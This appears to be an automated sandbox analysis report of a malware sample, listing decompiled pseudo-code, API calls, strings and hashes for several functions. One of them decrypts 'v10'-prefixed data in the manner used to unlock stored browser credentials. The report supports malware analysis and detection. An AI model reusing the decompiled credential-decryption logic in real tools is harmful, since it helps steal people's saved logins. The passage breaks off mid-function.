API String ID: 3297800586-1377252038
Opcode ID: e92e312d5d204238e7d5915cb80a050582dba2b37e4e2479a3e765c414c5de93
Instruction ID: 66bcbfa12c47a7b243dae5b922f3538c000b73fa1233262f6746d47cd767108c
Opcode Fuzzy Hash: e92e312d5d204238e7d5915cb80a050582dba2b37e4e2479a3e765c414c5de93
Instruction Fuzzy Hash: FC51C032905104EFDB08DBA9D985BCE7BB8DF89314F10407FE005BB1D2DB786A4686AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041276B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041276B(void* __ebx, void** __ecx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t26;
				void* _t32;
				void* _t37;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;
				signed int _t51;
				long _t68;
				void* _t71;

				_push(0x5c);
				E00423679(E004333D8, __ebx, __edi, __esi);
				_t26 =  *(_t71 + 8);
				_t70 = "0123456789ABCDEF";
				_t68 = _t71 - 0x24;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *(_t71 - 0x60) = __ecx;
				 *(_t71 - 0x68) = _t26;
				 *(_t71 - 0x64) =  *(_t71 + 0xc);
				asm("movsb");
				_t51 = 0;
				if(lstrlenA(_t26) > 0) {
					_t70 =  *(_t71 - 0x68);
					_t32 = E00422440(_t71 - 0x24,  *_t70);
					if(_t32 != 0) {
						_t68 = _t32 - _t71 - 0x24 << 4;
						_t37 = E00422440(_t71 - 0x24, _t70[1]);
						if(_t37 == 0) {
							goto L2;
						} else {
							_t51 =  !(_t37 - _t71 - 0x00000024 + _t68 ^ 0xffffffa3) & 0x000000ff;
							_t13 = lstrlenA(_t70) - 1; // -1
							_t68 = _t13;
							 *( *(_t71 - 0x64)) = _t68;
							_t43 = HeapAlloc(GetProcessHeap(), 8, _t68);
							 *( *(_t71 - 0x60)) = _t43;
							if(_t43 == 0) {
								goto L2;
							} else {
								_t44 = E004049CF(_t71 - 0x40, _t70);
								 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
								_t70 = _t71 - 0x5c;
								_t45 = E0040CD3B(_t71 - 0x40, _t71 - 0x5c, _t44, 2, 0xffffffff);
								if( *((intOrPtr*)(_t45 + 0x14)) >= 0x10) {
									_t45 =  *_t45;
								}
								E004203AC( *( *(_t71 - 0x60)), _t68, _t45);
								E00404A66(_t71 - 0x5c, 1, 0);
								E00404A66(_t71 - 0x40, 1, 0);
								goto L8;
							}
						}
					} else {
						L2:
					}
				}
				return E004236C3(_t51, _t68, _t70);
			}

0x0041276b
0x00412772
0x00412777
0x0041277a
0x0041277f
0x00412782
0x00412783
0x00412784
0x00412785
0x00412786
0x0041278d
0x00412790
0x00412793
0x00412794
0x0041279e
0x004127a4
0x004127af
0x004127b8
0x004127c9
0x004127d3
0x004127dc
0x00000000
0x004127de
0x004127ec
0x004127f8
0x004127f8
0x00412801
0x0041280a
0x00412813
0x00412817
0x00000000
0x00412819
0x0041281d
0x00412822
0x0041282b
0x0041282e
0x00412837
0x00412839
0x00412839
0x00412842
0x00412851
0x0041285d
0x00000000
0x0041285d
0x00412817
0x004127ba
0x004127ba
0x004127ba
0x004127b8
0x00412869

APIs

__EH_prolog3_GS.LIBCMT ref: 00412772
lstrlenA.KERNEL32(00000000,0000005C,004128D9,?,?,00000098,004131BA,?,?,?), ref: 00412796
lstrlenA.KERNEL32(?,?,?,00000098,004131BA,?,?,?), ref: 004127F2
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,00000098,004131BA,?,?,?), ref: 00412803
HeapAlloc.KERNEL32(00000000,?,?,00000098,004131BA,?,?,?), ref: 0041280A
_strcpy_s.LIBCMT ref: 00412842

Strings

0123456789ABCDEF, xrefs: 0041277A

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heaplstrlen$AllocH_prolog3_Process_strcpy_s
String ID: 0123456789ABCDEF
API String ID: 2514983032-2554083253
Opcode ID: 63e6d95504ed21eb8921339b8310e99e567df582b112bd730247366615fbce66
Instruction ID: 81906bd5bdf6ebc19bf72c8cee0b840c7b3519b2a4650dbb8bd86868ca49c7bf
Opcode Fuzzy Hash: 63e6d95504ed21eb8921339b8310e99e567df582b112bd730247366615fbce66
Instruction Fuzzy Hash: B331CF71A00305AFDB04EFA4DD45BDE37B8AF49304F10006AF811EB2D1DB78AA05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00416615 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00416615(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t24;
				intOrPtr _t39;
				void* _t44;

				_push(0x14);
				E00423610(E00432FD3, __ebx, __edi, __esi);
				E0041F1C0(_t44 - 0x14, 0);
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t39 =  *0x4477dc; // 0x5b10a0
				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
				_t19 = E0040F302( *((intOrPtr*)(_t44 + 8)), E0040F24F(_t44 - 0x14, 0x445ac8));
				_t43 = _t19;
				if(_t19 == 0) {
					if(_t39 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t24 = E0040F337(__ebx, _t39, _t43, __eflags);
						__eflags = _t24 - 0xffffffff;
						if(_t24 == 0xffffffff) {
							E0041FDD3(_t44 - 0x20, "bad cast");
							E004231B6(_t44 - 0x20, 0x44170c);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4477dc =  *((intOrPtr*)(_t44 - 0x10));
						E0040F280( *((intOrPtr*)(_t44 - 0x10)));
						E0041EE1F(__eflags, _t43);
					} else {
						_t43 = _t39;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0041F1E8(_t44 - 0x14);
				return E004236AF(_t43);
			}

0x00416615
0x0041661c
0x00416626
0x0041662b
0x0041662f
0x0041663a
0x00416647
0x0041664c
0x00416650
0x00416654
0x0041665a
0x00416660
0x00416661
0x00416668
0x0041666b
0x00416675
0x00416683
0x00416683
0x00416688
0x0041668d
0x00416693
0x00416699
0x00416656
0x00416656
0x00416656
0x00416654
0x0041669f
0x004166a6
0x004166b2

APIs

__EH_prolog3.LIBCMT ref: 0041661C
std::_Lockit::_Lockit.LIBCPMT ref: 00416626

Part of subcall function 0040F24F: std::_Lockit::_Lockit.LIBCPMT ref: 0040F25D

std::bad_exception::bad_exception.LIBCMT ref: 00416675
__CxxThrowException@8.LIBCMT ref: 00416683
std::locale::facet::_Incref.LIBCPMT ref: 00416693
std::locale::facet::_Facet_Register.LIBCPMT ref: 00416699

Strings

bad cast, xrefs: 0041666D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 158301680-3145022300
Opcode ID: 3f2510a9c4576688650ad28ce11d860461497511615cb57dadd1e7a402de1537
Instruction ID: 78bc80bac5fe92e2ea0add490b5e15320975fab7b56fb442f0d740f20ef994aa
Opcode Fuzzy Hash: 3f2510a9c4576688650ad28ce11d860461497511615cb57dadd1e7a402de1537
Instruction Fuzzy Hash: AC01C4359002259BCB11EB61DC026EE7334AF10324F51027FE810772D1DB3CAE4A878C

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2B7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041A2B7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t39;
				void* _t44;

				_push(0x14);
				E00423610(E00432FD3, __ebx, __edi, __esi);
				E0041F1C0(_t44 - 0x14, 0);
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t39 =  *0x4477e4; // 0x5b15b8
				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
				_t19 = E0040F302( *((intOrPtr*)(_t44 + 8)), E0040F24F(_t44 - 0x14, 0x457ff4));
				_t43 = _t19;
				if(_t19 == 0) {
					if(_t39 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_t23 = E0041A3EF(_t44 - 0x10, __edx, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041FDD3(_t44 - 0x20, "bad cast");
							E004231B6(_t44 - 0x20, 0x44170c);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4477e4 =  *((intOrPtr*)(_t44 - 0x10));
						E0040F280( *((intOrPtr*)(_t44 - 0x10)));
						E0041EE1F(__eflags, _t43);
					} else {
						_t43 = _t39;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0041F1E8(_t44 - 0x14);
				return E004236AF(_t43);
			}

0x0041a2b7
0x0041a2be
0x0041a2c8
0x0041a2cd
0x0041a2d1
0x0041a2dc
0x0041a2e9
0x0041a2ee
0x0041a2f2
0x0041a2f6
0x0041a2fc
0x0041a302
0x0041a308
0x0041a30b
0x0041a315
0x0041a323
0x0041a323
0x0041a328
0x0041a32d
0x0041a333
0x0041a339
0x0041a2f8
0x0041a2f8
0x0041a2f8
0x0041a2f6
0x0041a33f
0x0041a346
0x0041a352

APIs

__EH_prolog3.LIBCMT ref: 0041A2BE
std::_Lockit::_Lockit.LIBCPMT ref: 0041A2C8

Part of subcall function 0040F24F: std::_Lockit::_Lockit.LIBCPMT ref: 0040F25D

std::bad_exception::bad_exception.LIBCMT ref: 0041A315
__CxxThrowException@8.LIBCMT ref: 0041A323
std::locale::facet::_Incref.LIBCPMT ref: 0041A333
std::locale::facet::_Facet_Register.LIBCPMT ref: 0041A339

Strings

bad cast, xrefs: 0041A30D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 158301680-3145022300
Opcode ID: 2eb38fb64f82dcd12bec79e6fc6734ae54990782b1a7a82c11e6c39711ca6a00
Instruction ID: 6afc7ab316eff0c980b8faef55d9dff35bcc06a6501917bc4b928620a44b6ed3
Opcode Fuzzy Hash: 2eb38fb64f82dcd12bec79e6fc6734ae54990782b1a7a82c11e6c39711ca6a00
Instruction Fuzzy Hash: 410161359012299BCB11EB65DD026EE72306F14325F50017FF8107B2E1EB7C5E8A879D

Uniqueness

Uniqueness Score: -1.00%

Function 0041A353 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041A353(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t38;
				void* _t43;

				_push(0x14);
				E00423610(E00432FD3, __ebx, __edi, __esi);
				E0041F1C0(_t43 - 0x14, 0);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t38 =  *0x4477e8; // 0x5b15e0
				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
				_t19 = E0040F302( *((intOrPtr*)(_t43 + 8)), E0040F24F(_t43 - 0x14, 0x457ff8));
				_t42 = _t19;
				if(_t19 == 0) {
					if(_t38 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_t23 = E0041A474(_t43 - 0x10, _t42, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041FDD3(_t43 - 0x20, "bad cast");
							E004231B6(_t43 - 0x20, 0x44170c);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x4477e8 =  *((intOrPtr*)(_t43 - 0x10));
						E0040F280( *((intOrPtr*)(_t43 - 0x10)));
						E0041EE1F(__eflags, _t42);
					} else {
						_t42 = _t38;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0041F1E8(_t43 - 0x14);
				return E004236AF(_t42);
			}

0x0041a353
0x0041a35a
0x0041a364
0x0041a369
0x0041a36d
0x0041a378
0x0041a385
0x0041a38a
0x0041a38e
0x0041a392
0x0041a398
0x0041a39e
0x0041a3a4
0x0041a3a7
0x0041a3b1
0x0041a3bf
0x0041a3bf
0x0041a3c4
0x0041a3c9
0x0041a3cf
0x0041a3d5
0x0041a394
0x0041a394
0x0041a394
0x0041a392
0x0041a3db
0x0041a3e2
0x0041a3ee

APIs

__EH_prolog3.LIBCMT ref: 0041A35A
std::_Lockit::_Lockit.LIBCPMT ref: 0041A364

Part of subcall function 0040F24F: std::_Lockit::_Lockit.LIBCPMT ref: 0040F25D

std::bad_exception::bad_exception.LIBCMT ref: 0041A3B1
__CxxThrowException@8.LIBCMT ref: 0041A3BF
std::locale::facet::_Incref.LIBCPMT ref: 0041A3CF
std::locale::facet::_Facet_Register.LIBCPMT ref: 0041A3D5

Strings

bad cast, xrefs: 0041A3A9

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 158301680-3145022300
Opcode ID: d34c4378578daa0c6d45566d75cd642b8e76de0bc252b032d205366eb70228cb
Instruction ID: 5325a22492948e1be5c624b26778590472e4ee069aa1a812293f3d63ff93319d
Opcode Fuzzy Hash: d34c4378578daa0c6d45566d75cd642b8e76de0bc252b032d205366eb70228cb
Instruction Fuzzy Hash: D9016D359012299BCB11EB61DC026EE72306F40328F90067BE820B72D2DB7C5E9A879D

Uniqueness

Uniqueness Score: -1.00%

Function 004166D7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004166D7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t38;
				void* _t43;

				_push(0x14);
				E00423610(E00432FD3, __ebx, __edi, __esi);
				E0041F1C0(_t43 - 0x14, 0);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t38 =  *0x4477e0; // 0x0
				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
				_t19 = E0040F302( *((intOrPtr*)(_t43 + 8)), E0040F24F(_t43 - 0x14, 0x457ff0));
				_t42 = _t19;
				if(_t19 == 0) {
					if(_t38 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_t23 = E004167A8(_t43 - 0x10, _t42, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041FDD3(_t43 - 0x20, "bad cast");
							E004231B6(_t43 - 0x20, 0x44170c);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x4477e0 =  *((intOrPtr*)(_t43 - 0x10));
						E0040F280( *((intOrPtr*)(_t43 - 0x10)));
						E0041EE1F(__eflags, _t42);
					} else {
						_t42 = _t38;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0041F1E8(_t43 - 0x14);
				return E004236AF(_t42);
			}

0x004166d7
0x004166de
0x004166e8
0x004166ed
0x004166f1
0x004166fc
0x00416709
0x0041670e
0x00416712
0x00416716
0x0041671c
0x00416722
0x00416728
0x0041672b
0x00416735
0x00416743
0x00416743
0x00416748
0x0041674d
0x00416753
0x00416759
0x00416718
0x00416718
0x00416718
0x00416716
0x0041675f
0x00416766
0x00416772

APIs

__EH_prolog3.LIBCMT ref: 004166DE
std::_Lockit::_Lockit.LIBCPMT ref: 004166E8

Part of subcall function 0040F24F: std::_Lockit::_Lockit.LIBCPMT ref: 0040F25D

std::bad_exception::bad_exception.LIBCMT ref: 00416735
__CxxThrowException@8.LIBCMT ref: 00416743
std::locale::facet::_Incref.LIBCPMT ref: 00416753
std::locale::facet::_Facet_Register.LIBCPMT ref: 00416759

Strings

bad cast, xrefs: 0041672D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 158301680-3145022300
Opcode ID: 989f12bc01ea9558bdd24b454494ad894f87736b0f8b104cb17c55daaa63e4fc
Instruction ID: 23223fae4e83948e19c7a19a0270144d5579ded8d9372b5e9e6c0d74341998b3
Opcode Fuzzy Hash: 989f12bc01ea9558bdd24b454494ad894f87736b0f8b104cb17c55daaa63e4fc
Instruction Fuzzy Hash: F90184359002259BCB11EB65DC426EE73306F10329F55067FE820772D2DB7C9E8A879C

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6E2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 38
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040E6E2(CHAR* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v72;
				intOrPtr _v124;
				char* _v128;
				void* _v132;
				signed int _t11;
				int _t20;
				char* _t21;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t29;

				_t28 = __esi;
				_t27 = __edi;
				_t23 = __ebx;
				_t11 =  *0x444664; // 0xfa3a0753
				_v8 = _t11 ^ _t29;
				E0041F6B0( &_v72, 0, 0x40);
				E0041F6B0( &_v132, 0, 0x3c);
				_v128 =  &_v72;
				_v132 = 0x3c;
				_v124 = 0x40;
				_t20 = InternetCrackUrlA(__ebx, lstrlenA(__ebx), 0x10000000,  &_v132);
				_t21 = _v128;
				if(_t20 == 0) {
					_t21 = "http";
				}
				return E0041F69E(_t21, _t23, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x0040e6e2
0x0040e6e2
0x0040e6e2
0x0040e6eb
0x0040e6f2
0x0040e6fd
0x0040e70a
0x0040e715
0x0040e722
0x0040e729
0x0040e738
0x0040e740
0x0040e743
0x0040e745
0x0040e745
0x0040e755

APIs

_memset.LIBCMT ref: 0040E6FD
_memset.LIBCMT ref: 0040E70A
lstrlenA.KERNEL32(00000000,10000000,?), ref: 0040E730
InternetCrackUrlA.WININET(00000000,00000000), ref: 0040E738

Strings

<, xrefs: 0040E722
@, xrefs: 0040E729
http, xrefs: 0040E745

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memset$CrackInternetlstrlen
String ID: <$@$http
API String ID: 3332450456-26727890
Opcode ID: 65befe4ce7632aa1d94ae677df39eb15e7f9ed42e55a9a542f486edfb6ea6568
Instruction ID: 73ffcc4abc73630125852943b292fbb3ab9f71d1ebce5bf20102c0233f43becc
Opcode Fuzzy Hash: 65befe4ce7632aa1d94ae677df39eb15e7f9ed42e55a9a542f486edfb6ea6568
Instruction Fuzzy Hash: 49019171A10208ABEB10DFA5DD46FDE77BCEB04704F50402AFA15F7191DB78A5098B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00E82610 Relevance: 12.1, APIs: 8, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E82610(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t2;
				void* _t3;
				void* _t9;
				void* _t18;
				void* _t28;

				_t25 = __edi;
				_t24 = __edx;
				_push(2);
				L00E83000();
				_push(E00E82ED1());
				L00E83024();
				_t2 = E00E82D07();
				L00E83042();
				 *_t2 = _t2;
				_t3 = E00E8243D(__ebx, __edx, __edi, 1);
				_pop(_t28);
				_t32 = _t3;
				if(_t3 == 0) {
					L8:
					E00E82BB6(_t24, _t25, _t28, 7);
					asm("int3");
					E00E82F13();
					__eflags = 0;
					return 0;
				} else {
					asm("fclex");
					E00E82F48();
					E00E825CA(_t32, E00E82F74);
					_t9 = E00E82BA6();
					_push(_t9);
					L00E82FD6();
					if(_t9 != 0) {
						goto L8;
					} else {
						E00E82ED7(_t9);
						if(E00E82F30() != 0) {
							_push(E00E82D07);
							L00E83006();
						}
						E00E82EE6(E00E8285B(E00E8285B(_t11)));
						_push(E00E82D07());
						L00E83036();
						if(E00E82EE3() != 0) {
							L00E82FDC();
						}
						E00E82D07();
						_t18 = E00E82D02();
						if(_t18 != 0) {
							goto L8;
						} else {
							return _t18;
						}
					}
				}
			}

APIs

_set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 00E82613
_set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00E8261E
__p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00E8262A
__RTC_Initialize.LIBCMT ref: 00E82642
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00E82F74), ref: 00E82657

Part of subcall function 00E82ED7: InitializeSListHead.KERNEL32(00ECF1F0,00E82667), ref: 00E82EDC

__setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002D07), ref: 00E82675
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00E82690
_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E8269F

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
String ID:
API String ID: 1933938900-0
Opcode ID: 606e75e01f36335e43eb0a8eb88dd64c7f4ceff3adfc3dc86a80982933013c08
Instruction ID: b83179e16277998c385ce4b0c56e004b1789edaa54a9f8578595898e4030f667
Opcode Fuzzy Hash: 606e75e01f36335e43eb0a8eb88dd64c7f4ceff3adfc3dc86a80982933013c08
Instruction Fuzzy Hash: DD014F70A443122AED3637F05E07A1E0AD41F20B58F44385CBB0C7E1D3EE5AC9419372

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA8C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040FA8C(void* __ebx, intOrPtr __ecx, char* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t52;
				void* _t54;
				int _t63;
				char* _t71;
				intOrPtr _t74;
				void* _t75;

				_push(0x70);
				E00423679(E00433170, __ebx, __edi, __esi);
				_t73 =  *(_t75 + 0xc);
				_t40 =  *(_t75 + 8);
				_t71 = __edx;
				 *(_t75 - 0x38) =  *(_t75 + 8);
				 *((intOrPtr*)(_t75 - 0x3c)) = __ecx;
				 *(_t75 - 0x34) = 0;
				if(_t73 < 3 || E004207E7(_t40, ?str?, 3) != 0) {
					_push(E0040FA24(_t73,  *(_t75 - 0x38), __eflags));
					goto L9;
				} else {
					if( *((intOrPtr*)(_t75 + 0x10)) == 0 ||  *((intOrPtr*)(_t75 - 0x3c)) == 0) {
						L7:
						_push("NULL");
						L9:
						E004049CF(_t71);
					} else {
						E0041F6B0(_t75 - 0x7c, 0, 0x40);
						_t50 =  *(_t75 - 0x38) + 3;
						_t63 = 0x40;
						 *((intOrPtr*)(_t75 - 0x74)) = _t50;
						_t51 = _t73 + _t50 - 0x13;
						_t73 = _t73 + 0xffffffe1;
						 *(_t75 - 0x7c) = _t63;
						 *((intOrPtr*)(_t75 - 0x78)) = 1;
						 *((intOrPtr*)(_t75 - 0x70)) = 0xc;
						 *((intOrPtr*)(_t75 - 0x64)) = _t51;
						 *((intOrPtr*)(_t75 - 0x60)) = 0x10;
						 *(_t75 - 0x34) = _t73;
						_t52 = LocalAlloc(_t63, _t73);
						 *(_t75 - 0x38) = _t52;
						if(_t52 == 0) {
							goto L7;
						} else {
							_t54 =  *0x447528( *((intOrPtr*)(_t75 - 0x3c)),  *((intOrPtr*)(_t75 - 0x70)) +  *((intOrPtr*)(_t75 - 0x74)),  *(_t75 - 0x34), _t75 - 0x7c, 0, 0, _t52,  *(_t75 - 0x34), _t75 - 0x34, 0);
							_t85 = _t54;
							if(_t54 < 0) {
								goto L7;
							} else {
								_t74 = 0xf;
								 *((intOrPtr*)(_t75 - 0x1c)) = _t74;
								 *((intOrPtr*)(_t75 - 0x20)) = 0;
								 *(_t75 - 0x30) = 0;
								E00404AAA(_t75 - 0x30, _t85,  *(_t75 - 0x38),  *(_t75 - 0x34));
								 *((intOrPtr*)(_t75 - 4)) = 0;
								 *((intOrPtr*)(_t71 + 0x14)) = _t74;
								 *((intOrPtr*)(_t71 + 0x10)) = 0;
								_t73 = _t75 - 0x30;
								 *_t71 = 0;
								E00404A22(_t71, _t75 - 0x30);
								E00404A66(_t75 - 0x30, 1, 0);
							}
						}
					}
				}
				return E004236C3(0, _t71, _t73);
			}

0x0040fa8c
0x0040fa93
0x0040fa98
0x0040fa9b
0x0040faa0
0x0040faa2
0x0040faa5
0x0040faa8
0x0040faae
0x0040fb9d
0x00000000
0x0040facc
0x0040facf
0x0040fb8c
0x0040fb8c
0x0040fb9e
0x0040fba0
0x0040fade
0x0040fae5
0x0040faf0
0x0040faf5
0x0040faf6
0x0040faf9
0x0040fafd
0x0040fb02
0x0040fb05
0x0040fb0c
0x0040fb13
0x0040fb16
0x0040fb1d
0x0040fb20
0x0040fb26
0x0040fb2b
0x00000000
0x0040fb2d
0x0040fb49
0x0040fb4f
0x0040fb51
0x00000000
0x0040fb53
0x0040fb55
0x0040fb5f
0x0040fb62
0x0040fb65
0x0040fb68
0x0040fb6d
0x0040fb70
0x0040fb73
0x0040fb76
0x0040fb79
0x0040fb7b
0x0040fb85
0x0040fb85
0x0040fb51
0x0040fb2b
0x0040facf
0x0040fbac

APIs

__EH_prolog3_GS.LIBCMT ref: 0040FA93
_memcmp.LIBCMT ref: 0040FABC
_memset.LIBCMT ref: 0040FAE5
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,000000FF,00000000,-0000000C,?,?,00000000), ref: 0040FB20

Part of subcall function 00404A22: _memmove.LIBCMT ref: 00404A3E

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

Strings

NULL, xrefs: 0040FB8C
v10, xrefs: 0040FAB6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _memmove$AllocH_prolog3_Local_memcmp_memset
String ID: NULL$v10
API String ID: 2751976447-1391045996
Opcode ID: 1b68d58eefc898a2920c30369dc928e4d32f4c0d5bf613042fedeaf175a451f0
Instruction ID: af6a4d3e4eed530347353630a09f14f45d84f4f456a0352adc8db99de868ecc4
Opcode Fuzzy Hash: 1b68d58eefc898a2920c30369dc928e4d32f4c0d5bf613042fedeaf175a451f0
Instruction Fuzzy Hash: DF316FB1E01218ABDF20DFA5E891A9DBBB9EF48314F14013EF904B7282D7395A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00421EEE Relevance: 10.6, APIs: 7, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 21%

			E00421EEE(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t19;
				intOrPtr _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t36;
				intOrPtr* _t37;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr* _t41;

